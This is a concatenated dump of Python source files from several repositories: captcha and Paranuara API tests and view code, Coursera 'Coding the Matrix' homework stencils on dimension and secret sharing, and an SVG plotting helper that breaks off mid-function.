class ImageTest( unittest.TestCase ):
# Runs before each test in this group
def setUp( self ):
globalSetup()
# This request generates a valid visualCaptcha session
response = client.get( '/start/5' )
# Should return 404 error when calling /image without the index number
def test_image_no_index( self ):
response = client.get( '/image' )
self.assertEqual( response.status_code, 404 )
# Should return an image file
def test_image_zero( self ):
response = client.get( '/image/0' )
self.assertEqual( response.status_code, 200 )
self.assertEqual( response['Content-Type'], "{'Expires': 0, 'Content-Type': 'image/png', 'Pragma': 'no-cache', 'Cache-Control': 'no-cache, no-store, must-revalidate'}" )
# Should return another image file
def test_image_one( self ):
response = client.get( '/image/1' )
self.assertEqual( response.status_code, 200 )
self.assertEqual( response['Content-Type'], "{'Expires': 0, 'Content-Type': 'image/png', 'Pragma': 'no-cache', 'Cache-Control': 'no-cache, no-store, must-revalidate'}" )
# Should return a retina image file
def test_image_retina( self ):
response = client.get( '/image/1?retina=1' )
self.assertEqual( response.status_code, 200 )
self.assertEqual( response['Content-Type'], "{'Expires': 0, 'Content-Type': 'image/png', 'Pragma': 'no-cache', 'Cache-Control': 'no-cache, no-store, must-revalidate'}" )
# Should return 404 error when calling /image with a non-existing index_number
def test_image_invalid_index( self ):
response = client.get( '/image/100' )
self.assertEqual( response.status_code, 404 )
# Test Try routes
class TryTest( unittest.TestCase ):
# Runs before each test in this group
def setUp( self ):
global frontendData
globalSetup()
# This request generates a valid visualCaptcha session
response = client.get( '/start/5' )
# We need to store this to use it later
frontendData = json.loads( response.content )
# Should redirect to /?status=failedPost when no data is posted
def test_no_data( self ):
response = client.post( '/try', {} )
self.assertEqual( response.status_code, 302 )
self.assertEqual( response.url, 'http://testserver/?status=failedPost' )
# Should redirect to /?status=failedImage when captcha image fails
def test_invalid_image( self ):
response = client.post( '/try', { frontendData['imageFieldName']: 'definitely-wrong-image-answer' } )
self.assertEqual( response.status_code, 302 )
self.assertEqual( response.url, 'http://testserver/?status=failedImage' )
# Should redirect to /?status=failedAudio when captcha image fails
def test_invalid_audio( self ):
response = client.post( '/try', { frontendData['audioFieldName']: 'definitely-wrong-audio-answer' } )
self.assertEqual( response.status_code, 302 )
self.assertEqual( response.url, 'http://testserver/?status=failedAudio' )
if __name__ == '__main__':
print "Running unit tests"
unittest.main()
```
|
{
"source": "jedi-Knight/paranuara-api-challenge-solution",
"score": 3
}
|
#### File: jedi-Knight/paranuara-api-challenge-solution/model.py
```python
from pandas import read_json, merge
class Model(object):
df = None
def __init__(self, left_table_json, right_table_json, left_key, right_key):
assert isinstance(left_table_json, str), 'Type mismatch! left_table_json must be of type str'
assert isinstance(right_table_json, str), 'Type mismatch! right_table_json must be of type str'
try:
companies_df = read_json(left_table_json)
users_df = read_json(right_table_json)
except FileNotFoundError:
raise AssertionError('People and companies data not found at the given URI!')
except:
raise AssertionError('There was a problem reading the data!')
self.df = merge(left=companies_df, right=users_df, left_on=left_key, right_on=right_key, how='outer')
```
#### File: jedi-Knight/paranuara-api-challenge-solution/test_http.py
```python
import pytest, requests
from json import loads
from config import INDEX_PAGE_CONTENT, ERROR_404_MESSAGE
BASE_URL = 'http://127.0.0.1:8080/'
@pytest.mark.parametrize('index_page, expected_response_code, expected_content_type, expected_content', [
('', 200, 'text/html; charset=UTF-8', INDEX_PAGE_CONTENT),
])
def test_endpoint_index_page(index_page, expected_response_code, expected_content_type, expected_content):
request = None
try:
request = requests.get(BASE_URL + index_page)
except:
raise AssertionError('App server not running!')
gotten_response_code = request.status_code
gotten_content_type = request.headers['Content-Type']
gotten_content = request.text
assert gotten_response_code == expected_response_code
assert gotten_content_type == expected_content_type
assert gotten_content == expected_content
@pytest.mark.parametrize('invalid_endpoint, expected_response_code, expected_content_type, expected_content', [
('Invalid', 404, 'text/html; charset=UTF-8', ERROR_404_MESSAGE),
('/Invalid', 404, 'text/html; charset=UTF-8', ERROR_404_MESSAGE),
('/Invalid/Invalid', 404, 'text/html; charset=UTF-8', ERROR_404_MESSAGE)
])
def test_endpoint_invalid(invalid_endpoint, expected_response_code, expected_content_type, expected_content):
request = None
try:
request = requests.get(BASE_URL + invalid_endpoint)
except:
raise AssertionError('App server not running!')
gotten_response_code = request.status_code
gotten_content_type = request.headers['Content-Type']
gotten_content = request.text
assert gotten_response_code == expected_response_code
assert gotten_content_type == expected_content_type
assert gotten_content == expected_content
@pytest.mark.parametrize('company_name, expected_response_code, expected_content_type, expected_content', [
('PERMADYNE', 200, 'application/json', '{"number-of-employees": 7, "employees": ["<NAME>", "<NAME>", "<NAME>", "<NAME>", "<NAME>", "<NAME>", "<NAME>"]}'),
('Non Existant', 200, 'application/json', '{"number-of-employees": 0, "employees": [], "message": "The company has no employees."}')
])
def test_endpoint_company(company_name, expected_response_code, expected_content_type, expected_content):
request = None
try:
request = requests.get(BASE_URL + 'company/' + company_name)
except:
raise AssertionError('App server not running!')
gotten_response_code = request.status_code
gotten_content_type = request.headers['Content-Type']
gotten_content = request.text
assert gotten_response_code == expected_response_code
assert gotten_content_type == expected_content_type
assert gotten_content == expected_content
@pytest.mark.parametrize('person_one, person_two, expected_response_code, expected_content_type, expected_content', [
('<NAME>','<NAME>', 200, 'application/json','{"user-1": {"name": "<NAME>", "age": 35.0, "address": "797 Vandervoort Place, Wheaton, Kentucky, 1051", "phone": "+1 (992) 532-3748"}, "user-2": {"name": "<NAME>", "age": 40.0, "address": "718 Locust Street, Ernstville, Kentucky, 741", "phone": "+1 (947) 466-2999"}, "friends-in-common": ["<NAME>", "<NAME>", "<NAME>", "<NAME>ie"]}'),
('Moon Herring', 'None Existant', 200, 'application/json', '{"message": "One or more users not found."}')
])
def test_endpoint_two_people(person_one, person_two, expected_response_code, expected_content_type, expected_content):
request = None
try:
request = requests.get(BASE_URL + 'user/' + person_one + '/' + person_two)
except:
raise AssertionError('App server not running!')
gotten_response_code = request.status_code
gotten_content_type = request.headers['Content-Type']
gotten_content = request.text
assert gotten_response_code == expected_response_code
assert gotten_content_type == expected_content_type
assert gotten_content == expected_content
@pytest.mark.parametrize('person_name, expected_response_code, expected_content_type, expected_content', [
('Moon Herring', 200, 'application/json', {"username": "Moon Herring", "age": 40, "fruits": ["orange"], "vegetables": ["carrot", "beetroot", "celery"]}),
('Non Existant', 200, 'application/json', {"message": "User not found."})
])
def test_endpoint_one_person(person_name, expected_response_code, expected_content_type, expected_content):
request = None
try:
request = requests.get(BASE_URL + 'user/' + person_name)
except:
raise AssertionError('App server not running!')
gotten_response_code = request.status_code
gotten_content_type = request.headers['Content-Type']
gotten_content = request.text
try:
gotten_content = loads(gotten_content)
except:
raise AssertionError('This endpoint must return a valid JSON string!')
if 'fruits' in gotten_content.keys():
gotten_content['fruits'] = set(gotten_content['fruits'])
expected_content['fruits'] = set(expected_content['fruits'])
if 'vegetables' in gotten_content.keys():
gotten_content['vegetables'] = set(gotten_content['vegetables'])
expected_content['vegetables'] = set(expected_content['vegetables'])
assert gotten_response_code == expected_response_code
assert gotten_content_type == expected_content_type
assert gotten_content == expected_content
```
#### File: jedi-Knight/paranuara-api-challenge-solution/test_view.py
```python
import pytest
@pytest.fixture(scope='module')
def view():
from model import Model
from config import DATA_FILES, DATA_MERGE_KEYS
from view import View
try:
view = View( Model( DATA_FILES['companies'], DATA_FILES['users'], DATA_MERGE_KEYS['companies'], DATA_MERGE_KEYS['users'] ) )
return view
except:
raise AssertionError('There was a problem creating the Model instance!')
@pytest.mark.parametrize('records, testfield, expected_result',[
([],'name',[]),
([{'name':'Any Name'}], 'name', [{'name':'Any Name'}]),
([{'name':'Any Name'},{'name':float('nan')},{'name':'Another Name'}], 'name', [{'name':'Any Name'}, {'name':'Another Name'}])
])
def test_remove_artefacts(view, records, testfield, expected_result):
assert view.remove_artefacts(records, testfield) == expected_result
@pytest.mark.parametrize('user_data, expected_result',[
([{'name': float('nan')}], {'employees': [],'message': 'The company has no employees.','number-of-employees': 0}),
([{'name': "Any Name"}, {'name': float('nan')}], {'number-of-employees': 1, 'employees': ["Any Name"]}),
([{'name': float('nan')}, {'name': float('nan')}], {'employees': [],'message': 'The company has no employees.','number-of-employees': 0}),
([{'name': "Any Name"}, {'name': "Another Name"}], {'number-of-employees': 2, 'employees': ["Any Name", "Another Name"]}),
([{'name': "Any Name"}, {'name': "Another Name"}, {'name': "Another Name"}, {'name': float('nan')}], {'number-of-employees': 3, 'employees': ["Any Name", "Another Name", "Another Name"]}),
])
def test_format_users_list(view, user_data, expected_result):
assert view.format_users_list(user_data) == expected_result
@pytest.mark.parametrize('two_user_data, common_friends, expected_output',[
([{'name': '<NAME>', 'age': 43.0, 'address': '381 Debevoise Avenue, Whitmer, Minnesota, 2849', 'phone': '+1 (879) 555-3032'}, {'name': '<NAME>', 'age': 60, 'address': '492 Stockton Street, Lawrence, Guam, 4854', 'phone': '+1 (893) 587-3311'}],
[{'name': '<NAME>'}, {'name': '<NAME>'}, {'name': '<NAME>'}, {'name': '<NAME>'},{"name":"<NAME>"}],
{"user-1": {"name": "<NAME>", "age": 43.0, "address": "381 Debevoise Avenue, Whitmer, Minnesota, 2849", "phone": "+1 (879) 555-3032"}, "user-2": {"name": "<NAME>", "age": 60.0, "address": "492 Stockton Street, Lawrence, Guam, 4854", "phone": "+1 (893) 587-3311"}, "friends-in-common": ["<NAME>", "<NAME>", "<NAME>"]}),
([],[],{"message": "One or more users not found."})
])
def test_format_two_users_data(view, two_user_data, common_friends, expected_output):
assert view.format_two_users_data(two_user_data, common_friends) == expected_output
@pytest.mark.parametrize('user_data, expected_result', [
([{'name': '<NAME>', 'age': 32, 'favouriteFood': ['orange', 'apple', 'carrot', 'strawberry']}], {"username": "Goodwin Cook", "age": 32.0, "fruits": ["apple", "strawberry", "orange"], "vegetables": ["carrot"]}),
([{'name': '<NAME>', 'age': 40, 'favouriteFood': ['orange', 'beetroot', 'carrot', 'celery']}], {"username": "Moon Herring", "age": 40.0, "fruits": ["orange"], "vegetables": ["celery", "beetroot", "carrot"]}),
([],{"message": "User not found."})
])
def test_format_user_data(view, user_data, expected_result):
gotten_result = view.format_user_data(user_data)
if 'fruits' in gotten_result.keys():
gotten_result['fruits'] = set(gotten_result['fruits'])
expected_result['fruits'] = set(expected_result['fruits'])
gotten_result['vegetables'] = set(gotten_result['vegetables'])
expected_result['vegetables'] = set(expected_result['vegetables'])
assert gotten_result == expected_result
@pytest.mark.parametrize('company_name, expected_result', [
("PERMADYNE", {"number-of-employees": 7, "employees": ["<NAME>", "<NAME>", "<NAME>", "<NAME>", "<NAME>", "<NAME>", "<NAME>"]}),
("ZOINAGE", {"number-of-employees": 9, "employees": ["<NAME>", "<NAME>", "<NAME>", "<NAME>", "<NAME>", "<NAME>", "<NAME>", "<NAME>", "<NAME>"]}),
("MICROLUXE", {"number-of-employees": 10, "employees": ["<NAME>", "<NAME>", "<NAME>", "<NAME>", "<NAME>", "<NAME>", "<NAME>", "<NAME>", "<NAME>", "<NAME>"]}),
("NETBOOK",{"number-of-employees": 0, "employees": [], "message": "The company has no employees."})
])
def test_company_users(view, company_name, expected_result):
assert view.company_users(company_name) == expected_result
@pytest.mark.parametrize('user_name_1, user_name_2, expected_result', [
("<NAME>", "<NAME>", {"user-1": {"name": "<NAME>", "age": 56.0, "address": "430 Frank Court, Camino, American Samoa, 2134", "phone": "+1 (889) 544-3275"}, "user-2": {"name": "<NAME>", "age": 35.0, "address": "797 Vandervoort Place, Wheaton, Kentucky, 1051", "phone": "+1 (992) 532-3748"}, "friends-in-common": ["<NAME>", "<NAME>", "<NAME>", "<NAME>", "<NAME>"]}),
("<NAME>", "WalterAvery", {"message": "One or more users not found."}),
("Lqws", "WalterAvery", {"message": "One or more users not found."}),
("Lqws", "<NAME>", {"message": "One or more users not found."}),
("<NAME>", "<NAME>", {"message": "One or more users not found."})
])
def test_two_users(view, user_name_1, user_name_2, expected_result):
assert view.two_users(user_name_1, user_name_2) == expected_result
@pytest.mark.parametrize('user_name, expected_result', [
("<NAME>", {"username": "Luna Rodgers", "age": 56, "fruits": ["banana"], "vegetables": ["beetroot", "celery", "cucumber"]}),
("<NAME>", {"username": "Moon Herring", "age": 40.0, "fruits": ["orange"], "vegetables": ["beetroot", "carrot", "celery"]}),
("Goodwin Cook", {"username": "Goodwin Cook", "age": 32, "fruits": ["apple", "strawberry", "orange"], "vegetables": ["carrot"]}),
("qeqweqwewqe",{"message": "User not found."})
])
def test_user(view, user_name, expected_result):
gotten_result = view.user(user_name)
if 'fruits' in gotten_result.keys():
gotten_result['fruits'] = set(gotten_result['fruits'])
expected_result['fruits'] = set(expected_result['fruits'])
gotten_result['vegetables'] = set(gotten_result['vegetables'])
expected_result['vegetables'] = set(expected_result['vegetables'])
assert gotten_result == expected_result
```
#### File: jedi-Knight/paranuara-api-challenge-solution/view.py
```python
from model import Model
from query import Query
from config import FOOD_TYPES
class View(object):
query = None
def __init__(self, model):
assert isinstance(model, Model), 'Type mismatch! model must be of type Model.'
self.query = Query(model)
def remove_artefacts(self, records, testfield):
assert isinstance(records, list), 'Type mismatch! records must be of type list.'
assert isinstance(testfield, str), 'Type mismatch! target_field must be of type str.'
artefacts_removed = []
for item in records:
if not isinstance(item[testfield], float):
artefacts_removed.append(item)
print(artefacts_removed)
return artefacts_removed
def format_users_list(self, users_data):
assert isinstance(users_data, list), 'Type mismatch! users_data must be of type list.'
users_data = self.remove_artefacts(users_data, 'name')
formatted_data = {
'number-of-employees': len(users_data),
'employees': [ item['name'] for item in users_data ]
}
if len(users_data) == 0:
formatted_data['message'] = 'The company has no employees.'
return formatted_data
def format_two_users_data(self, two_user_data, common_friends):
assert isinstance(two_user_data, list), 'Type mismatch! two_user_data must be of type list.'
assert isinstance(common_friends, list), 'Type mismatch! friends_in_common must be of type list.'
if len(two_user_data) == 2:
common_friends_semantic_filtered = []
for friend in common_friends:
if friend['name'] != two_user_data[0]['name'] and friend['name'] != two_user_data[1]['name']:
common_friends_semantic_filtered.append(friend['name'])
formatted_data = {
'user-1': two_user_data[0],
'user-2': two_user_data[1],
'friends-in-common': common_friends_semantic_filtered
}
else:
formatted_data = {
'message': 'One or more users not found.'
}
return formatted_data
def format_user_data(self, user_data):
assert isinstance(user_data, list), 'Type mismatch! users_data must be of type list.'
if len(user_data) > 0:
user_data = user_data[0]
user_favourite_food = set(user_data['favouriteFood'])
formatted_data = {
'username': user_data['name'],
'age': int(user_data['age']),
'fruits': list( user_favourite_food & FOOD_TYPES['fruits'] ),
'vegetables': list( user_favourite_food & FOOD_TYPES['vegetables'] )
}
else:
formatted_data = {
"message": "User not found."
}
return formatted_data
def company_users(self, company_name):
assert isinstance(company_name, str), 'Type mismatch! company_name must be of type str.'
users_data = self.query.single_column_value_match('company', company_name, ['name'])
return self.format_users_list(users_data)
def two_users(self, user_name_1, user_name_2):
assert isinstance(user_name_1, str), 'Type mismatch! user_name_1 must be of type str.'
assert isinstance(user_name_2, str), 'Type mismatch! user_name_2 must be of type str.'
two_users_data = self.query.single_column_list_of_values_match('name', [user_name_1, user_name_2], ['name', 'age', 'address', 'phone', 'friends'])
common_friends_ids = set()
for user in two_users_data:
common_friends_ids = common_friends_ids | set([ user_friend['index'] for user_friend in user['friends'] ])
del(user['friends'])
common_friends_ids = list(common_friends_ids)
common_friends = self.query.multi_column_match(['name'], ('index_y', common_friends_ids), ('eyeColor', 'brown'), ('has_died', False))
return self.format_two_users_data(two_users_data, common_friends)
def user(self, user_name):
assert isinstance(user_name, str), 'Type mismatch! user_name must be of type str.'
user_data = self.query.single_column_value_match('name',user_name,['name', 'age', 'favouriteFood'])
return self.format_user_data(user_data)
```
|
{
"source": "jedi-Knight/teaching-material-python-lesson-3",
"score": 3
}
|
#### File: jedi-Knight/teaching-material-python-lesson-3/data_series_mean.py
```python
def calculate(xData):
xData = [float(x) for x in xData]
return sum(xData)/len(xData)
```
|
{
"source": "JediKoder/coursera-CodeMatrix",
"score": 4
}
|
#### File: coursera-CodeMatrix/homeworks/05_Dimension_problems.py
```python
coursera = 1
# Please fill out this stencil and submit using the provided submission script.
from vecutil import list2vec
from GF2 import one
from solver import solve
from matutil import listlist2mat, coldict2mat
from mat import Mat
from vec import Vec
## 1: (Problem 1) Iterative Exchange Lemma
w0 = list2vec([1,0,0])
w1 = list2vec([0,1,0])
w2 = list2vec([0,0,1])
v0 = list2vec([1,2,3])
v1 = list2vec([1,3,3])
v2 = list2vec([0,3,3])
# Fill in exchange_S1 and exchange_S2
# with appropriate lists of 3 vectors
exchange_S0 = [w0, w1, w2]
exchange_S1 = [...]
exchange_S2 = [...]
exchange_S3 = [v0, v1, v2]
## 2: (Problem 2) Another Iterative Exchange Lemma
w0 = list2vec([0,one,0])
w1 = list2vec([0,0,one])
w2 = list2vec([one,one,one])
v0 = list2vec([one,0,one])
v1 = list2vec([one,0,0])
v2 = list2vec([one,one,0])
exchange_2_S0 = [w0, w1, w2]
exchange_2_S1 = [...]
exchange_2_S2 = [...]
exchange_2_S3 = [v0, v1, v2]
## 3: (Problem 3) Morph Lemma Coding
def morph(S, B):
'''
Input:
- S: a list of distinct Vecs
- B: a list of linearly independent Vecs all in Span S
Output: a list of pairs of vectors to inject and eject (see problem description)
Example:
>>> # This is how our morph works. Yours may yield different results.
>>> # Note: Make a copy of S to modify instead of modifying S itself.
>>> from vecutil import list2vec
>>> from vec import Vec
>>> S = [list2vec(v) for v in [[1,0,0],[0,1,0],[0,0,1]]]
>>> B = [list2vec(v) for v in [[1,1,0],[0,1,1],[1,0,1]]]
>>> D = {0, 1, 2}
>>> morph(S, B) == [(Vec(D,{0: 1, 1: 1, 2: 0}), Vec(D,{0: 1, 1: 0, 2: 0})), (Vec(D,{0: 0, 1: 1, 2: 1}), Vec(D,{0: 0, 1: 1, 2: 0})), (Vec(D,{0: 1, 1: 0, 2: 1}), Vec(D,{0: 0, 1: 0, 2: 1}))]
True
>>> S == [list2vec(v) for v in [[1,0,0],[0,1,0],[0,0,1]]]
True
>>> B == [list2vec(v) for v in [[1,1,0],[0,1,1],[1,0,1]]]
True
>>> from GF2 import one
>>> D = {0, 1, 2, 3, 4, 5, 6, 7}
>>> S = [Vec(D,{1: one, 2: one, 3: one, 4: one}), Vec(D,{1: one, 3: one}), Vec(D,{0: one, 1: one, 3: one, 5: one, 6: one}), Vec(D,{3: one, 4: one}), Vec(D,{3: one, 5: one, 6: one})]
>>> B = [Vec(D,{2: one, 4: one}), Vec(D,{0: one, 1: one, 2: one, 3: one, 4: one, 5: one, 6: one}), Vec(D,{0: one, 1: one, 2: one, 5: one, 6: one})]
>>> sol = morph(S, B)
>>> sol == [(B[0],S[0]), (B[1],S[2]), (B[2],S[3])] or sol == [(B[0],S[1]), (B[1],S[2]), (B[2],S[3])]
True
>>> # Should work the same regardless of order of S
>>> from random import random
>>> sol = morph(sorted(S, key=lambda x:random()), B)
>>> sol == [(B[0],S[0]), (B[1],S[2]), (B[2],S[3])] or sol == [(B[0],S[1]), (B[1],S[2]), (B[2],S[3])]
True
'''
pass
## 4: (Problem 4) Row and Column Rank Practice
# Please express each solution as a list of Vecs
row_space_1 = [...]
col_space_1 = [...]
row_space_2 = [...]
col_space_2 = [...]
row_space_3 = [...]
col_space_3 = [...]
row_space_4 = [...]
col_space_4 = [...]
## 5: (Problem 5) Subset Basis
def subset_basis(T):
'''
Input:
- T: a set of Vecs
Output:
- set S containing Vecs from T that is a basis for Span T.
Examples:
The following tests use the procedure is_independent, provided in module independence
>>> from vec import Vec
>>> from independence import is_independent
>>> a0 = Vec({'a','b','c','d'}, {'a':1})
>>> a1 = Vec({'a','b','c','d'}, {'b':1})
>>> a2 = Vec({'a','b','c','d'}, {'c':1})
>>> a3 = Vec({'a','b','c','d'}, {'a':1,'c':3})
>>> sb = subset_basis({a0, a1, a2, a3})
>>> len(sb)
3
>>> all(v in [a0, a1, a2, a3] for v in sb)
True
>>> is_independent(sb)
True
>>> b0 = Vec({0,1,2,3},{0:2,1:2,3:4})
>>> b1 = Vec({0,1,2,3},{0:1,1:1})
>>> b2 = Vec({0,1,2,3},{2:3,3:4})
>>> b3 = Vec({0,1,2,3},{3:3})
>>> sb = subset_basis({b0, b1, b2, b3})
>>> len(sb)
3
>>> all(v in [b0, b1, b2, b3] for v in sb)
True
>>> is_independent(sb)
True
>>> D = {'a','b','c','d'}
>>> c0, c1, c2, c3, c4 = Vec(D,{'d': one, 'c': one}), Vec(D,{'d': one, 'a': one, 'c': one, 'b': one}), Vec(D,{'a': one}), Vec(D,{}), Vec(D,{'d': one, 'a': one, 'b': one})
>>> subset_basis({c0,c1,c2,c3,c4}) == {c0,c1,c2,c4}
True
'''
pass
## 6: (Problem 6) Superset Basis Lemma in Python
def superset_basis(C, T):
'''
Input:
- C: linearly independent set of Vecs
- T: set of Vecs such that every Vec in C is in Span(T)
Output:
Linearly independent set S consisting of all Vecs in C and some in T
such that the span of S is the span of T (i.e. S is a basis for the span
of T).
Example:
>>> from vec import Vec
>>> from independence import is_independent
>>> a0 = Vec({'a','b','c','d'}, {'a':1})
>>> a1 = Vec({'a','b','c','d'}, {'b':1})
>>> a2 = Vec({'a','b','c','d'}, {'c':1})
>>> a3 = Vec({'a','b','c','d'}, {'a':1,'c':3})
>>> sb = superset_basis({a0, a3}, {a0, a1, a2})
>>> a0 in sb and a3 in sb
True
>>> is_independent(sb)
True
>>> all(x in [a0,a1,a2,a3] for x in sb)
True
'''
pass
## 7: (Problem 7) My Is Independent Procedure
def my_is_independent(L):
'''
Input:
- L: a list of Vecs
Output:
- boolean: true if the list is linearly independent
Examples:
>>> D = {0, 1, 2}
>>> L = [Vec(D,{0: 1}), Vec(D,{1: 1}), Vec(D,{2: 1}), Vec(D,{0: 1, 1: 1, 2: 1}), Vec(D,{0: 1, 1: 1}), Vec(D,{1: 1, 2: 1})]
>>> my_is_independent(L)
False
>>> my_is_independent(L[:2])
True
>>> my_is_independent(L[:3])
True
>>> my_is_independent(L[1:4])
True
>>> my_is_independent(L[0:4])
False
>>> my_is_independent(L[2:])
False
>>> my_is_independent(L[2:5])
False
>>> L == [Vec(D,{0: 1}), Vec(D,{1: 1}), Vec(D,{2: 1}), Vec(D,{0: 1, 1: 1, 2: 1}), Vec(D,{0: 1, 1: 1}), Vec(D,{1: 1, 2: 1})]
True
'''
pass
## 8: (Problem 8) My Rank
def my_rank(L):
'''
Input:
- L: a list of Vecs
Output:
- the rank of the list of Vecs
Example:
>>> L = [list2vec(v) for v in [[1,2,3],[4,5,6],[1.1,1.1,1.1]]]
>>> my_rank(L)
2
>>> L == [list2vec(v) for v in [[1,2,3],[4,5,6],[1.1,1.1,1.1]]]
True
>>> my_rank([list2vec(v) for v in [[1,1,1],[2,2,2],[3,3,3],[4,4,4],[123,432,123]]])
2
'''
pass
## 9: (Problem 9) Direct Sum Unique Representation
def direct_sum_decompose(U_basis, V_basis, w):
'''
Input:
- U_basis: a list of Vecs forming a basis for a vector space U
- V_basis: a list of Vecs forming a basis for a vector space V
- w: a Vec in the direct sum of U and V
Output:
- a pair (u, v) such that u + v = w, u is in U, v is in V
Example:
>>> D = {0,1,2,3,4,5}
>>> U_basis = [Vec(D,{0: 2, 1: 1, 2: 0, 3: 0, 4: 6, 5: 0}), Vec(D,{0: 11, 1: 5, 2: 0, 3: 0, 4: 1, 5: 0}), Vec(D,{0: 3, 1: 1.5, 2: 0, 3: 0, 4: 7.5, 5: 0})]
>>> V_basis = [Vec(D,{0: 0, 1: 0, 2: 7, 3: 0, 4: 0, 5: 1}), Vec(D,{0: 0, 1: 0, 2: 15, 3: 0, 4: 0, 5: 2})]
>>> w = Vec(D,{0: 2, 1: 5, 2: 0, 3: 0, 4: 1, 5: 0})
>>> (u, v) = direct_sum_decompose(U_basis, V_basis, w)
>>> (u + v - w).is_almost_zero()
True
>>> U_matrix = coldict2mat(U_basis)
>>> V_matrix = coldict2mat(V_basis)
>>> (u - U_matrix*solve(U_matrix, u)).is_almost_zero()
True
>>> (v - V_matrix*solve(V_matrix, v)).is_almost_zero()
True
>>> ww = Vec(D,{0: 2, 1: 5, 2: 51, 4: 1, 5: 7})
>>> (u, v) = direct_sum_decompose(U_basis, V_basis, ww)
>>> (u + v - ww).is_almost_zero()
True
>>> (u - U_matrix*solve(U_matrix, u)).is_almost_zero()
True
>>> (v - V_matrix*solve(V_matrix, v)).is_almost_zero()
True
>>> U_basis == [Vec(D,{0: 2, 1: 1, 2: 0, 3: 0, 4: 6, 5: 0}), Vec(D,{0: 11, 1: 5, 2: 0, 3: 0, 4: 1, 5: 0}), Vec(D,{0: 3, 1: 1.5, 2: 0, 3: 0, 4: 7.5, 5: 0})]
True
>>> V_basis == [Vec(D,{0: 0, 1: 0, 2: 7, 3: 0, 4: 0, 5: 1}), Vec(D,{0: 0, 1: 0, 2: 15, 3: 0, 4: 0, 5: 2})]
True
>>> w == Vec(D,{0: 2, 1: 5, 2: 0, 3: 0, 4: 1, 5: 0})
True
'''
pass
## 10: (Problem 10) Is Invertible Function
def is_invertible(M):
'''
input: A matrix, M
outpit: A boolean indicating if M is invertible.
>>> M = Mat(({0, 1, 2, 3}, {0, 1, 2, 3}), {(0, 1): 0, (1, 2): 1, (3, 2): 0, (0, 0): 1, (3, 3): 4, (3, 0): 0, (3, 1): 0, (1, 1): 2, (2, 1): 0, (0, 2): 1, (2, 0): 0, (1, 3): 0, (2, 3): 1, (2, 2): 3, (1, 0): 0, (0, 3): 0})
>>> is_invertible(M)
True
>>> M1 = Mat(({0,1,2},{0,1,2}),{(0,0):1,(0,2):2,(1,2):3,(2,2):4})
>>> is_invertible(M1)
False
'''
pass
## 11: (Problem 11) Inverse of a Matrix over GF(2)
def find_matrix_inverse(A):
'''
Input:
- A: an invertible Mat over GF(2)
Output:
- A Mat that is the inverse of A
Examples:
>>> M1 = Mat(({0,1,2}, {0,1,2}), {(0, 1): one, (1, 0): one, (2, 2): one})
>>> find_matrix_inverse(M1) == Mat(M1.D, {(0, 1): one, (1, 0): one, (2, 2): one})
True
>>> M2 = Mat(({0,1,2,3},{0,1,2,3}),{(0,1):one,(1,0):one,(2,2):one})
>>> find_matrix_inverse(M2) == Mat(M2.D, {(0, 1): one, (1, 0): one, (2, 2): one})
True
'''
pass
## 12: (Problem 12) Inverse of a Triangular Matrix
def find_triangular_matrix_inverse(A):
'''
Supporting GF2 is not required.
Input:
- A: an upper triangular Mat with nonzero diagonal elements
Output:
- Mat that is the inverse of A
Example:
>>> A = listlist2mat([[1, .5, .2, 4],[0, 1, .3, .9],[0,0,1,.1],[0,0,0,1]])
>>> find_triangular_matrix_inverse(A) == Mat(({0, 1, 2, 3}, {0, 1, 2, 3}), {(0, 1): -0.5, (1, 2): -0.3, (3, 2): 0.0, (0, 0): 1.0, (3, 3): 1.0, (3, 0): 0.0, (3, 1): 0.0, (2, 1): 0.0, (0, 2): -0.05000000000000002, (2, 0): 0.0, (1, 3): -0.87, (2, 3): -0.1, (2, 2): 1.0, (1, 0): 0.0, (0, 3): -3.545, (1, 1): 1.0})
True
'''
pass
```
#### File: coursera-CodeMatrix/homeworks/06_secret_sharing_lab.py
```python
coursera = 1
# Please fill out this stencil and submit using the provided submission script.
import random
from GF2 import one
from vecutil import list2vec
## 1: (Task 1) Choosing a Secret Vector
def randGF2(): return random.randint(0,1)*one
a0 = list2vec([one, one, 0, one, 0, one])
b0 = list2vec([one, one, 0, 0, 0, one])
def choose_secret_vector(s,t):
pass
## 2: (Task 2) Finding Secret Sharing Vectors
# Give each vector as a Vec instance
secret_a0 = ...
secret_b0 = ...
secret_a1 = ...
secret_b1 = ...
secret_a2 = ...
secret_b2 = ...
secret_a3 = ...
secret_b3 = ...
secret_a4 = ...
secret_b4 = ...
```
#### File: coursera-CodeMatrix/homeworks/plotting.py
```python
import webbrowser
from numbers import Number
import tempfile
import os
import atexit
_browser = None
def plot(L, scale=4, dot_size = 3, browser=None):
""" plot takes a list of points, optionally a scale (relative to a 200x200 frame),
optionally a dot size (diameter) in pixels, and optionally a browser name.
It produces an html file with SVG representing the given plot,
and opens the file in a web browser. It returns nothing.
"""
scalar = 200./scale
origin = (210, 210)
hpath = create_temp('.html')
with open(hpath, 'w') as h:
h.writelines(
['<!DOCTYPE html>\n'
,'<head>\n'
,'<title>plot</title>\n'
,'</head>\n'
,'<body>\n'
,'<svg height="420" width=420 xmlns="http://www.w3.org/2000/svg">\n'
,'<line x1="0" y1="210" x2="420" y2="210"'
,'style="stroke:rgb(0,0,0);stroke-width:2"/>\n'
,'<line x1="210" y1="0" x2="210" y2="420"'
,'style="stroke:rgb(0,0,0);stroke-width:2"/>\n'])
for pt in L:
if isinstance(pt, Number):
x,y = pt.real, pt.imag
else:
if isinstance(pt, tuple) or isinstance(pt, list):
x,y = pt
else:
raise ValueError
h.writelines(['<circle cx="%d" cy="%d" r="%d" fill="red"/>\n'
% (origin[0]+scalar*x,origin[1]-scalar*y,dot_size)])
h.writelines(['</svg>\n</body>\n</html>'])
if browser is None:
browser = _browser
webbrowser.get(browser).open('file://%s' % hpath)
def setbrowser(browser=None):
""" Registers the given browser and saves it as the module default.
This is used to control which browser is used to display the plot.
The argument should be a value that can be passed to webbrowser.get()
to obtain a browser. If no argument is given, the default is reset
to the system default.
webbrowser provides some predefined browser names, including:
'firefox'
'opera'
If the browser string contains '%s', it is interpreted as a literal
browser command line. The URL will be substituted for '%s' in the command.
For example:
'google-chrome %s'
'cmd "start iexplore.exe %s"'
See the webbrowser documentation for more detailed information.
Note: Safari does not reliably work with the webbrowser module,
so we recommend using a different browser.
"""
global _browser
if browser is None:
_browser = None # Use system default
else:
webbrowser.register(browser, None, webbrowser.get(browser))
_browser = browser
def getbrowser():
""" Returns the module's default browser """
return _browser
# Create a temporary file that will be removed at exit
# Returns a path to the file
def create_temp(suffix='', prefix='tmp', dir=None):
